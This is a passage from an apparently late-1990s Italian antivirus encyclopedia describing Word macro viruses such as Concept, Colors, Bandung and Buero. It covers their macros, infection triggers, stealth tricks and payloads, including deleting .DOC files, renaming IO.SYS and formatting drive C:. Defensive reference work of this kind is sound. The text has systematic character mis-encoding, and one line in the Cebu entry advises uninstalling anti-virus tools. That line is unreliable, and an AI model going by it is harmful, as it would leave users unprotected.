Data di origine: Agosto/Settembre 1996. Distruttivo: No. Rilevato In The Wild: No. Descrizione: La differenza tra questa nuova versione e il virus Bandung.A originale Φ che AutoExec, Strumenti/Macro e ToolsCustomize Macro sono alterati. A causa della variazione, Bandung.B non attiva la sua procedura distruttiva. Al posto della attivazione della procedura, compaiono vari messaggi d'errore. Bandung.B Φ ancora in grado di infettare il modello di documento principale ed altri documenti. Bandung utilizza "Strumenti/macro" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). [Word_Bandung.C] Nome del virus: Word.Bandung.C. Tipo di Virus: Virus da macro di Word. Numero di Macro: 6. Criptato: No. Nomi delle Macro: AutoExec, AutoOpen, File/Salva, File/Salva con nome, Strumenti/macro, Toolscustomize. Lunghezza della Macro: 5428 Byte. Paese di origine: Bandung, Indonesia. Data di origine: Dicembre 1996. Payload: Si. Rilevato In The Wild: No. Descrizione: La differenza tra questa nuova versione e il virus Bandung.A originale Φ che la macro "AutoExec" Φ sostituita con la macro "AutoOpen" alterata dal virus Rapi. La procedura sostituisce la lettera "a" con "#@." Questo si verifica quando viene chiamata la macro "ToolsCustomize". Bandung.C utilizza "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). A causa del nuovo codice macro, Bandung.C mostra un messaggio di errore di sintassi ogni volta che viene avviato Microsoft Word. [Word_Bandung.D] Nome del virus: Word.Bandung.D. Tipo di Virus: Virus da macro di Word. Numero di Macro: 6. Criptato: No. Nomi delle Macro: AutoExec, AutoOpen, File/Salva, File/Salva con nome, Strumenti/macro, Toolscustomize. Lunghezza della Macro: 4262 Byte. Paese di origine: Bandung, Indonesia. Data di origine: Dicembre 1996. Distruttivo: Si. Rilevato In The Wild: No. Descrizione: La differenza tra questa nuova versione e il virus Bandung.A originale Φ che la macro "AutoExec" Φ alterata. Anche se la variazione Φ nella macro "AutoExec", Bandung.D attiva la sua procedura distruttiva quando si avvia Microsoft Word. Un'altra procedura sostituisce la lettera "a" con "#@." Questo si verifica quando viene chiamata la macro "ToolsCustomize. Bandung.D usa la tecnica macro stealth per nascondersi. Bandung.D utilizza "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). A causa della sua alterazione, Bandung.D mostra dei messaggi d'errore. Per ulteriori informazioni vedere la descrizione del virus Bandung.A. [Word_Bandung.E] Nome del virus: Word.Bandung.E Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoExec, AutoOpen, File/Salva, File/Salva con nome, Strumenti/macro, Toolscustomize Lunghezza della Macro: 4262 Byte Paese di origine: Bandung, Indonesia Data di origine: Gennaio 1997 Payload: Si Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione e il virus Bandung.A originale Φ l'alterazione della macro "AutoExec". La procedura sostituisce la lettera "a" con "#@." Questo si verifica quando viene chiamata la macro "ToolsCustomize". Bandung.E usa "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). A causa della sua alterazione, Bandung.E non esegue mai la sua procedura distruttiva. Al suo posto compare il seguente messaggio di errore di Wordbasic: " Out of Memory " [Word_Bandung.G] Nome del virus: Word.Bandung.G Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoExec, AutoOpen, File/Salva, File/Salva con nome, Strumenti/Macro, ToolsCustomize Lunghezza della Macro: 1990 Byte Paese di origine: Bandung, Indonesia Data di origine: Gennaio 1997 Payload: Si Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova versione e il virus Bandung.A originale Φ la macro "AutoExec". Bandung.G contiene solo due linee. Una linea Φ vuota mentre l'altra contiene il comando "DisableAutoMacro". La procedura sostituisce la lettera "a" con "#@." Questo si verifica quando viene chiamata la macro "ToolsCustomize". Bandung.G non ha la procedura distruttiva dal virus Bandung.A originale. [Word_Bandung.I] Nome del virus: Word.Bandung.I Tipo di Virus: Virus da macro di Word Numero di Macro: 6 Criptato: No Nomi delle Macro: AutoExec, AutoOpen, File/Salva, File/Salva con nome, Strumenti/Macro, ToolsCustomize Lunghezza della Macro: 1988 Byte Paese di origine: Bandung, Indonesia Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova versione e il virus Bandung.A originale Φ la macro "AutoExec". Bandung.I contiene solo tre linee tratte da una soluzione anti-virus, che disabilita tutte le autoMacro. Bandung.G non ha la procedura distruttiva dal virus Bandung.A originale. Per ulteriori informazioni vedere la descrizione del virus Bandung.A. [Word_Bertik.A] Nome del virus: Word.Bertik.A Tipo di Virus: Virus da macro di Word Numero di Macro: 5 Criptato: Si Nomi delle Macro: XXXAO, XXXFS, XXXFSA, Payload, AutoOpen (YYYAO, File/Salva, File/Salva con nome) Lunghezza della Macro: 2988 Byte Paese di origine: Sconosciuto Data di origine: Primavera 1997 Payload: Si Rilevato In The Wild: Si Descrizione: Bertik.A infetta il modello di documento principale (normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono aperti (AutoOpen) o salvati (File/Salva e File/Salva con nome). Bertik non Φ distruttivo, copia solo il file WINWORD.HLP nella directory del modello principale. Questo si verifica ogni volta che Bertik infetta un nuovo documento. Durante il processo di copiatura, WINWORD.HLP Φ rinominato al numero.WRD, dove "number" incrementa ad ogni infezione. A causa della misura di WINWORD.HLP, Bertik pu≥ riempire lo spazio dell'hard drive. Dopo un'infezione di Bertik, la directory del modello principale dovrebbe essere controllata ai file "*.WRD". Bertik fa comparire il seguente messaggio quando trova un hard drive pieno: " !!!Made by virus Bertik 1 !!! " [Word_Birthday.A:De (a.k.a. PCW)] Nome del virus: Word.Birthday.A:De (a.k.a. PCW). Tipo di Virus: Virus da macro di Word. Numero di Macro: 2. Criptato: Si. Nomi delle Macro: AutoOpen, DateiSpeichernUnter. Lunghezza della Macro: 1039 Byte. Paese di origine: Germania: rivista di computer tedesca. Data di origine: Luglio 1996. Distruttivo: No. Rilevato In The Wild: No. Descrizione: Birthday infetta il modello di documento principale (normal.dot) quando viene aperto un file infetto. Altri documenti divengono infetti quando viene usato il comando "DateiSpeichernUnter". Compare il seguente messaggio: " Happy Birthday! Herzlichen Glⁿckwunsch... " [Word_Boom.A:De (a.k.a. Boombastic)] Nome del virus: Word.Boom.A:De (a.k.a. Boombastic) Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: AutoExec, AutoOpen, DateiSpeichernUnter, System Lunghezza della Macro: 2863 Byte Paese di origine: Germania Data di origine: Luglio 1996 Payload: Si Rilevato In The Wild: Si Descrizione: Boom Φ il secondo virus da macro scritto per la versione tedesca di Microsoft Word. La procedura distruttiva di Boom rinomina la struttura del menu di Word con: Datei -> Mr.Boombastic Bearbeiten -> and Ansicht -> Sir WIXALOT Einfuegen -> are Format -> watching Extras -> you Tabelle -> ! Fenster -> ! Hilfe -> ! Viene inviata una musica allo speaker del PC durante il processo di rinomina. Dopo la modifica, Boom crea un nuovo modello di documento principale ed inserisce il seguente testo: " Greetings from Mr. Boombastic and Sir WIXALOT !!! " " Oskar L., wir kriegen dich!!! " "Dies ist eine Initiative des Institutes zur Vermeidung und Verbreitung von " " Peinlichkeiten, durch in der Oeffentlichkeit stehende Personen, unter der " " Schirmherrschaft von Rudi S. ! " Boom stampa questo testo. [Word_Box.B] Nome del virus: Word.Box.B Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: Si Nomi delle Macro: Box, Dead, AutoOpen, AutoClose, File/Stampa, FilePrint default, Strumenti/Macro Lunghezza della Macro: 1988 Byte Paese di origine: Taiwan Data di origine: Febbraio 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: Box.B infetta il modello di documento principale ed altri documenti quando un documento infetto viene aperto (AutoOpen) o chiuso (AutoClose). Box.B utilizza "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Box.B Φ formato da diverse procedure distruttive. Una procedura formatta il drive C:\ , un'altra blocca il virus basato sul DOS "One Half.3544". Una terza procedura mostra il seguente messaggio e lo aggiunge ai documenti stampati: " Taiwan Super No. 1 Macro Virus " " Twno1-S " " Today is my Birthday " Box.B lavora solo con la versione cinese di Microsoft Word. [Word_Buero.A (a.k.a Bureau, BuroNeu)] Nome del virus: Word.Buero.A (a.k.a Bureau, BuroNeu) Tipo di Virus: Virus da macro di Word Numero di Macro: 2 Criptato: Si Nomi delle Macro: AutoOpen (DateiSpeichern), BueroNeu Lunghezza della Macro: 697 Byte Paese di origine: Germania Data di origine: Agosto 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: Buero Φ un altro virus da macro scritto per la versione tedesca di Microsoft Word. Buero infetta il modello di documento principale (Normal.dot) quando viene aperto un documento infetto. Altri documenti divengono infetti con il comando "DateiSpeichern" (solo nel modello di documento principale). Dopo la data 15 agosto 1996, Buero rinomina il file di sistema "IO.SYS" a "IIO.SYS." Questa operazione impedisce l'avvio del computer. La seconda procedura distruttiva cerca i file C:\*.DOC e li cancella. [Word_Cap.a] Nome del virus: Word.Cap.a Tipo di Virus: Virus da macro di Word Numero di Macro: diverse Criptato: Si Nomi delle Macro: CAP Lunghezza della Macro: diverse Paese di origine: Sconosciuto Data di origine: Dicembre 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: Cap.A Φ un altro complesso virus da macro in grado di diffondere in varie versioni locali di Microsoft Word. Mentre alcune macro mantengono lo stesso nome, ad altre vengono automaticamente assegnati nuovi nomi dalla versione locale di Word. Quando Cap.A infetta il modello di documento principale, cancella tutte le macro esistenti. Infetta il modello di documento principale quando viene aperto un documento infetto. Cap.A utilizza "Strumenti/Macro" e "FileTemplates" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). [Word_Cebu.A] Nome del virus: Word.Cebu.A Tipo di Virus: Virus da macro di Word Numero di Macro: 4 o pi∙ Criptato: Si Nomi delle Macro: AutoOpen, AutoClose, AutoExec, MSRun Lunghezza della Macro: 1237 Byte Paese di origine: Hong Kong Data di origine: Primavera 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: Cebu infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono aperti (AutoOpen) o chiusi (AutoClose). Quando Cebu si attiva (probabilitα di 59/60), sostituisce la parola " Asian " con " Cebu ". Ci≥ si verifica quando Φ avviato Microsoft Word (AutoExec) e 5 minuti pi∙ tardi (probabilitα di 2/15). Cebu Φ uno dei poche virus da macro che copia le macro dell'utente, perci≥ pu≥ esistere con 4 o pi∙ macro. Si raccomanda di disinstallare le soluzioni anti-virus (come Scanprot) in modo da prevenire l'intercettazione di macro da parte di Cebu. [Word_Cebu.B] Nome del virus: Word.Cebu.B Tipo di Virus: Virus da macro di Word Numero di Macro: 4 o pi∙ Criptato: Si Nomi delle Macro: AutoOpen, AutoClose, AutoExec, MSRun Lunghezza della Macro: 1976 Byte Paese di origine: Sconosciuto Data di origine: Maggio 1997 Distruttivo: Si Rilevato In The Wild: No Descrizione: Cebu.B infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando vengono aperti (AutoOpen) o chiusi (AutoClose). La differenza maggiore tra questa nuova versione ed il virus Cebu.A Φ che Cebu.B possiede dei codici modificati e contiene inoltre diversi bug. Per ulteriori informazioni vedere la descrizione del virus Cebu.A. [Word_Chaos.A] Nome del virus: Word.Chaos.A Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: Si Nomi delle Macro: File/Apri (TempFile/Apri), File/Salva (TempFile/Salva), AutoExec (TempAutoExec), TempAutoOpen (AutoOpen) Lunghezza della Macro: 2810 Byte Paese di origine: Sconosciuto Data di origine: Giugno 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: Chaos infetta il modello di documento principale quando viene aperto un documento infetto. Altri documenti divengono infetti quando sono aperti (File/Apri) o chiusi (File/Salva). Avviando Word (AutoExec), Chaos colloca il seguente testo nella barra di stato: (l'operatore lo riconosce e lo cancella) " number/500 " Quando un numero random del lato sinistro raggiunge 500, Chaos cerca di bloccare il computer. [Word_Clock.A:De (a.k.a Extra)] Nome del virus: Word.Clock.A:De (a.k.a Extra) Tipo di Virus: Virus da macro di Word Numero di Macro: 11 Criptato: Si Nomi delle Macro: Action, AutoExec, AutoOpen, Extrasmakro, DateiSchliessen, Datumunduhrzeit, DateiDokVorlagen, Dateiallesspeichern, Oeffnen, Speichern Lunghezza della Macro: 3795 Byte Paese di origine: USA Data di origine: Estate 1996 Payload: Si Rilevato In The Wild: No Descrizione: Clock Φ un altro virus da macro scritto per la versione tedesca di Microsoft Word. Utilizza "ExtrasMakro" e "DateiDokVorlagen" per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Quando viene aperto un documento infetto dopo il giorno 26 di ogni mese, l'orologio mostra una finestra contenente l'ora. Attiva inoltre una delle sue procedure, che imposta l'ora di sistema al valore di 33 nel campo dei secondi. L'orologio fa questo ogni 2 -3 minuti, con il risultato di una minore precisione dell'ora di sistema. La seconda procedura parte nel 1997. L'orologio controlla l'ora di sistema, ed in caso di un valore dei minuti inferire a 5 , perde il controllo delle macro "File/Apri"e "File/Salva". Questo succede solo: Il giorno 1di ogni mese Il giorno 2 di ogni mese Il giorno 13 di ogni mese Il giorno 21di ogni mese Il giorno 27 di ogni mese [Word_Colors.A (a.k.a Rainbow)] Nome del virus: Word.Colors.A (a.k.a Rainbow) Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoClose, AutoExec, AutoOpen, File/Esci, File/Nuovo, File/Salva, File/Salva con nome, Macro, Strumenti/Macro Lunghezza della Macro: 6470 Byte Paese di origine: Portogallo Data di origine: Inviato su Usenet ottobre 1995 Payload: Si Rilevato In The Wild: Si Descrizione: Colors Φ il primo virus da macro che pu≥ giα infettare, anche quando tutte le Auto-Macro sono disattivate. Utilizza "Srumenti/Macro" per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Con l'attivazione da una delle sue macro (ad eccezione di AutoExec), Colors cerca di infettare il modello di documento principale (normal.dot). Controlla che tutte le sue macro siano giα presenti nel modello di documento principale, se "NO" trasferisce le macro del virus o sostituisce quelle giα esistenti. Il modello di documento principale diviene infetto quando un documento infetto viene aperto, salvato, chiuso o si esce da Microsoft Word. Altri documenti divengono infetti quando un file viene creato (File/Nuovo) o salvato (File/Salva, File/Salva con nome). La procedura distruttiva Φ localizzata nella macro "Macro". Una volta attivato, Colors crea una variabile nella sezione [Windows] di Win.ini con il nome "countersu," che conteggia partendo da zero. Dopo ogni 300 chiamate, Colors cambia il colore delle linguette di 21 elementi del desktop di Windows. Lo sfondo, i tasti ed i bordi avranno dei nuovi colori selezionati a caso, conferendo al desktop un look originale. [Word_Colors.B (a.k.a Colo-b)] Nome del virus: Word.Colors.B (a.k.a Colo-b) Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoClose, AutoExec, AutoOpen, File/Esci, File/Nuovo, File/Salva, File/Salva con nome, Macro, Strumenti/Macro Lunghezza della Macro: 7006 Byte Paese di origine: Portogallo Data di origine: Aprile 1996 Payload: Si Rilevato In The Wild: No Descrizione: Colors.B sembra essere una nuova versione del precedente virus Colors.A. Tutte le macro sembrano identiche a Colors.A, tranne la macro "AutoOpen", che sembra provenire dal virus Concept. Sembra che un documento infetto di Colors sia stato reinfettato da Concept, che ha sostituito con una sua macro la macro "AutoOpen". Colors.B Φ giα in grado di replicarsi, anche se ha il nuovo codice del virus da un virus diverso. Colors.B Φ il primo virus il cui codice proviene dalla combinazione di due differenti virus (Colors.A e Concept.A). [Word_Colors.C (a.k.a Colo-c)] Nome del virus: Word.Colors.C (a.k.a Colo-c) Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoClose, AutoExec, AutoOpen, File/Esci, File/Nuovo, File/Salva, File/Salva con nome, Macro, Strumenti/Macro Lunghezza della Macro: 6493 Byte Paese di origine: Sconosciuto Data di origine: Luglio 1996 Payload: Si Rilevato In The Wild: No Descrizione: Colors.C sembra essere una versione alterata del virus Colors.A. Questo successivo esempio di virus infettava il modello di documento principale (normal.dot) e nuovi documenti i quali erano per≥ incapaci di infettare altri documenti. Solo la prima generazione era in grado di infettare altri file. Colors.C non Φ quindi in grado di sopravvivere a lungo. [Word_Colors.D (a.k.a Colo-d)] Nome del virus: Word.Colors.D (a.k.a Colo-d) Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoClose, AutoExec, AutoOpen, File/Esci, File/Nuovo, File/Salva, File/Salva con nome, Macro, Strumenti/Macro Lunghezza della Macro: 19688 Byte Paese di origine: Sconosciuto Data di origine: Agosto 1996 Payload: Si Rilevato In The Wild: No Descrizione: Colors.D sembra sia la combinazione del precedente virus Colors.A e la soluzione per virus da macro di Microsoft "Scanprot". Malgrado Colors.D possegga nel suo codice una soluzione anti-virus, Φ ancora in grado di diffondersi ed infettare modello di documento principale (normal.dot) ed altri documenti. [Word_Colors.E] Nome del virus: Word.Colors.E Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoClose, AutoExec, AutoOpen, File/Esci, File/Nuovo, File/Salva, File/Salva con nome, Macro, Strumenti/Macro Lunghezza della Macro: 6290 Byte Paese di origine: Sconosciuto Data di origine: Autunno 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova versione ed il virus Colors.A Φ che la macro "AutoOpen" Φ stata sostituita con una inoffensiva. Questo non ha effetto sul virus. Colors.E Φ infatti in grado di attivarsi ed infettare altri documenti. [Word_Colors.F] Nome del virus: Word.Colors.F Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoClose, AutoExec, AutoOpen, File/Esci, File/Nuovo, File/Salva, File/Salva con nome, Macro, Strumenti/Macro Lunghezza della Macro: 6402 Byte Paese di origine: Sconosciuto Data di origine: Autunno 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: L'unica differenza tra questa nuova versione ed il virus Colors.A Φ che la macro "AutoOpen" Φ stata sostituita con una nuova. Questo non ha effetto sul virus. Colors.F Φ infatti in grado di attivarsi ed infettare altri documenti. [Word_Colors.G] Nome del virus: Word.Colors.G Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoClose, AutoExec, AutoOpen, File/Esci, File/Nuovo, File/Salva, File/Salva con nome, Macro, Strumenti/Macro Lunghezza della Macro: 7006 Byte Paese di origine: Sconosciuto Data di origine: Gennaio1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Colors.G Φ una versione minore del vecchio virus Colors.B. L'unica differenza tra questa nuova versione ed il virus Colors.B Φ che la macro "AutoOpen" Φ stata sostituita con una macro criptata di Concept. Inoltre, la macro "Strumenti/Macro" da Colors.B Φ alterata. A causa del diverso codice del virus, Colors.B non si attiva quando viene aperto un documento infetto. Colors.F utilizza "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Per ulteriori informazioni vedere la descrizione del virus Colors.A. [Word_Colors.H] Nome del virus: Word.Colors.H Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoClose, AutoExec, AutoOpen, File/Esci, File/Nuovo, File/Salva, File/Salva con nome, Macro, Strumenti/Macro Lunghezza della Macro: 9984 Byte Paese di origine: Sconosciuto Data di origine: Gennaio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Colors.H Φ una versione minore basata sul vecchio virus Colors.A e su la soluzione anti-virus da macro "WWFix" di Datafellows. Anche se Colors.H possiede un anti-virus nel suo codice, Φ giα in grado di diffondersi ed infettare altri documenti. Quando viene aperto un documento infetto, la nuova macro AutoOpen cerca nel sistema il virus Concept. Dopo lo scan cerca di installare le macro protettive che non sono presenti. Come conseguenza Colors.H mostra il seguente messaggio d'errore: " Document is not open " Colors.H utilizza "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un documento infetto (chiamata tecnica macro stealth). Per ulteriori informazioni vedere la descrizione del virus Colors.A. [Word_Colors.I] Nome del virus: Word.Colors.I Tipo di Virus: Virus da macro di Word Numero di Macro: 8 Criptato: Si Nomi delle Macro: AutoExec, AutoOpen, AutoClose, File/Esci, File/Salva, File/Salva con nome, Strumenti/Macro, Macro Lunghezza della Macro: 6117 Byte Paese di origine: Sconosciuto Data di origine: 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Colors.I Φ una nuova versione dell'originale virus Colors.A. La differenza maggiore Φ la macro "AutoOpen" che probabilmente proviene da un altro virus. Questa nuova macro copia le macro "AutoOpen", "AutoClose" e "File/Salva con nome" nel modello di documento principale invece di chiamare le routine nella macro "Macro". Inoltre, Colors.I non possiede nessuna macro "File/Nuovo". Colors.I infetta quando un documento infetto viene chiuso (AutoClose), salvato (File/Salva and File/Salva con nome) e quando viene utilizzato il comando Strumenti/Macro. Colors.I usa "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Per ulteriori informazioni vedere la descrizione del virus Colors.A. [Word_Color.J] Nome del virus: Word.Colors.J Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: AutoClose, AutoExec, AutoOpen, File/Esci, File/Nuovo, File/Salva, File/Salva con nome, Macro, Strumenti/Macro Lunghezza della Macro: 6983 Byte Paese di origine: Sconosciuto Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Colors.J Φ una versione minore del virus Colors.B. La sola differenza tra i due Φ una linea di un codice irrilevante. Colors.J usa "Strumenti/Macro" per rendere pi∙ difficile l'identificazione di un file infetto (chiamata tecnica macro stealth). Per ulteriori informazioni vedere la descrizione del virus Colors.B. [Word_Colors.K] Nome del virus: Word.Colors.K Tipo di Virus: Virus da macro di Word Numero di Macro: 9 Criptato: Si Nomi delle Macro: Macro, File/Nuovo, AutoExec, AutoOpen, File/Esci, File/Salva, AutoClose, File/Salva con nome, Strumenti/Macro Lunghezza della Macro: 6288 Byte Paese di origine: Sconosciuto Data di origine: Febbraio 1997 Distruttivo: No Rilevato In The Wild: No Descrizione: Colors.K Φ una nuova versione del virus originale Colors.A. La sola differenza tra i due Φ la macro"AutoOpen", che con sole tre linee, Φ stata agganciata ad un altro documento. Per ulteriori informazioni vedere la descrizione del virus Colors.A. [Word_Concept.A (a.k.a Prank, WW6Macro, Winword, WBMV)] Nome del virus: Word.Concept.A (a.k.a Prank, WW6Macro, Winword, WBMV) Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen, AAAZAO, AAAZFS (File/Salva con nome), Payload Lunghezza della Macro: 1968 Byte Paese di origine: USA Data di origine: Luglio 1995 Distruttivo: No Rilevato In The Wild: Si Descrizione: Concept Φ stato il primo virus da macro ad essere trovato "In-the-Wild." Fu scoperto a luglio/agosto 1995 ed ora rappresenta il virus pi∙ comune. Concept si attiva quando viene aperto un documento infetto (AutoOpen). Una volta attivato, Concept controlla eventuali precedenti infezioni del modello di documento principale (normal.dot). Se nessuna delle macro Φ presente, Concept copia le sue macro. La macro "AAAZFS" viene salvata con il nome "File/Salva con nome." Dopo aver infettato il modello di documento principale, Concept penetra nel file Win.ini. Colloca "WW6I=1" e compare una finestra contenente un "1". Concept non contiene nessuna procedura distruttiva, anche se possiede la macro chiamata "Payload. La macro" The "Payload" Φ vuota ad eccezione del seguente testo: " That's enough to prove my point " [Word_Concept.B] Nome del virus: Word.Concept.B Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen, AAAZAO, AAAZFS (File/Salva con nome), Payload Lunghezza della Macro: 2016 Byte Paese di origine: Francia Data di origine: Primavera 1996 Distruttivo: No Rilevato In The Wild: Si Descrizione: L'unica differenza tra Concept.A e Concept.B Φ che l'autore del virus ha tradotto la macro "File/Salva con nome" nel corrispondente termine francese. Per questo motivo questa versione lavora solo con la versione francese di Microsoft Word. [Word_Concept.C] Nome del virus: Word.Concept.C Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen, F1, F2, Boom, File/Salva con nome Lunghezza della Macro: 1834 Byte nei file con estensione *.doc, 1559 Byte nei file nei file con estensione *.dot Paese di origine: Sconosciuto Data di origine: Estate 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione ed il virus Concept originale risiede nei nomi delle macro e nel contenuto della macro "Boom". Concept.C si attiva quando viene aperto un documento infetto (AutoOpen). Altri documenti divengono infetti quando vengono salvati con il comando "File/Salva con nome". Concept.C fa comparire una finestra contenente un " 1 ". La macro "Boom" contiene un altro messaggio, non ancora apparso: " Fight racism; Smash Fascizm " [Word_Concept.D] Nome del virus: Word.Concept.D (a.k.a. Haha) Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: 3 delle 4 macro Nomi delle Macro: AutoOpen (File/Salva con nome), EditSize, FileSort, HaHa Lunghezza della Macro: 2129 Byte nei file nei file con estensione *.doc, 2041 Byte nei file nei file con estensione *.dot Paese di origine: Sconosciuto Data di origine: Estate 1996 Payload Si Rilevato In The Wild: No Descrizione: Concept.D si attiva quando viene aperto un file infetto (AutoOpen). Altri documenti divengono infetti quando vengono salvati con il comando File/Salva con nome. All'infezione di un nuovo documento, Concept.D modifica in bianco il colore di tutti i testi esistenti, ci≥ da l'impressione che tutto il testo scompaia (o sia stato cancellato). Concept.D aggiunge quindi al documento attivo il seguente testo: " i said: say goodbye to all your stuff (look at that hard drive spin!). " Nel tentativo di salvare un documento infetto, Concept.D cerca di salvare il documento 100 volte, causando un funzionamento irregolare del disco. [Word_Concept.E] Nome del virus: Word.Concept.E Tipo di Virus: Virus da macro di Word Numero di Macro: 4 Criptato: No Nomi delle Macro: AutoOpen (File/Salva con nome), AAAZAO, AAAZFS, Load Lunghezza della Macro: 1657 Byte nei file nei file con estensione *.doc, 1472 Byte nei file nei file con estensione *.dot Paese di origine: Sconosciuto Data di origine: Estate 1996 Payload : Si Rilevato In The Wild: No Descrizione: La differenza tra questa nuova versione ed il virus Concept risiede nei nomi delle macro e nel contenuto della macro "Load". Concept.E si attiva quando viene aperto un documento infetto (AutoOpen). Altri documenti divengono infetti quando vengono salvati con il comando File/Salva con nome. All'infezione di un nuovo documento, Concept.E fa comparire una finestra contenente un " 1 ". Concept.E possiede un codice virale che cerca di salvare il documento attivo nella directory T:\VIR. [Word_Concept.F (a.k.a. Parasite 1.0, P-Site)] Nome del virus: Word.Concept.F (a.k.a. Parasite 1.0, P-Site) Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: Si Nomi delle Macro: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen Lunghezza della Macro: 3673 Byte nei file nei file con estensione *.doc, 3453 Byte nei file nei file con estensione *.dot Paese di origine: USA Data di origine: Luglio 1996 Distruttivo: Si Rilevato In The Wild: Si Descrizione: Concept.F possiede diverse procedure. La prima sostituisce nei documenti infetti la seguente parola: "and" con "not". La seconda procedura Φ un po' pi∙ complessa. Concept.F controlla l'ora di sistema cercando un determinato valore nel campo dei giorni. Se Φ presente un 16 (il 16 di ogni mese), attiva le sue procedura. Sostituisce quindi nei documenti infetti le seguenti lettere/parole: "." (dot) con "," (virgola) "and" con "not" "a" con "e" Questa nuova versione di Concept fa anche comparire la seguente finestra: " Parasite Virus 1.0 " " Your computer is infected with the Parasite Virus, Version 1.0! " [Word_Concept.G (a.k.a. Parasite 0.8, P-Site)] Nome del virus: Word.Concept.G (a.k.a. Parasite 0.8, P-Site) Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: Si Nomi delle Macro: K, A678, Para, Site, I8U9Y13, Paylaod, AutoOpen Lunghezza della Macro: 3670 Byte nei file nei file con estensione *.doc, 3450 Byte nei file nei file con estensione *.dot Paese di origine: USA Data di origine: Luglio/Agosto 1996 Distruttivo: Si Rilevato In The Wild: No Descrizione: In base al codice del virus Concept.G, questa nuova versione Φ una beta release del virus Concept.F (versione 1.0). Concept.G possiede diverse procedura. La prima sostituisce nei documenti infetti le seguenti parole: "and" con "not" La seconda procedura Φ un po' pi∙ complessa. Concept.G controlla l'ora di sistema cercando un determinato valore nel campo dei giorni. Se Φ presente un 16 (il 16 di ogni mese), attiva le sue procedure. Sostituisce quindi nei documenti infetti le seguenti lettere/parole: "." (dot) con "," (virgola) "and" con "not" "a" con "e" [Word_Concept.I] Nome del virus: Word.Concept.I Tipo di Virus: Virus da macro di Word Numero di Macro: 4 o 5 Criptato: No Nomi delle Macro: AAAEED, AAAUUO, IPayload, DocClose, ToolsSpelling Lunghezza della Macro: 2885 Byte Paese di origine: USA Data di origine: Settembre 1996 Distruttivo: No Rilevato In The Wild: No Descrizione: Concept.I si attiva quando viene chiuso un documento infetto (DocClose). Altri documenti divengono infetti in due modi diversi. Infetta quando si seleziona l'opzione "Tools/Spelling" o Quando viene chiuso un documento infetto (DocClose). A seconda della routine di infezione selezionata, un nuovo documento infetto conterrα 5 macro (routine di infezione DocClose) o soltanto 4 macro (routine di infezione Tools/Spelling). All'infezione di un nuovo documento, Concept.I fa comparire una finestra contenente un " 1 ". [Word_Concept.J (a.k.a. Parasite.B)] Nome del virus: Word.Concept.J (a.k.a. Parasite.B) Tipo di Virus: Virus da macro di Word Numero di Macro: 7 Criptato: Si Nomi delle Macro: K, A678, Para, Site, Payload, AutoOpen Lunghezza della Macro: 3326 Byte nei file .doc, 3042 Byte nei file .dot Paese di origine: USA Data di origine: Estate 1996 Distruttivo: Si Rilevato In The Wild: Si 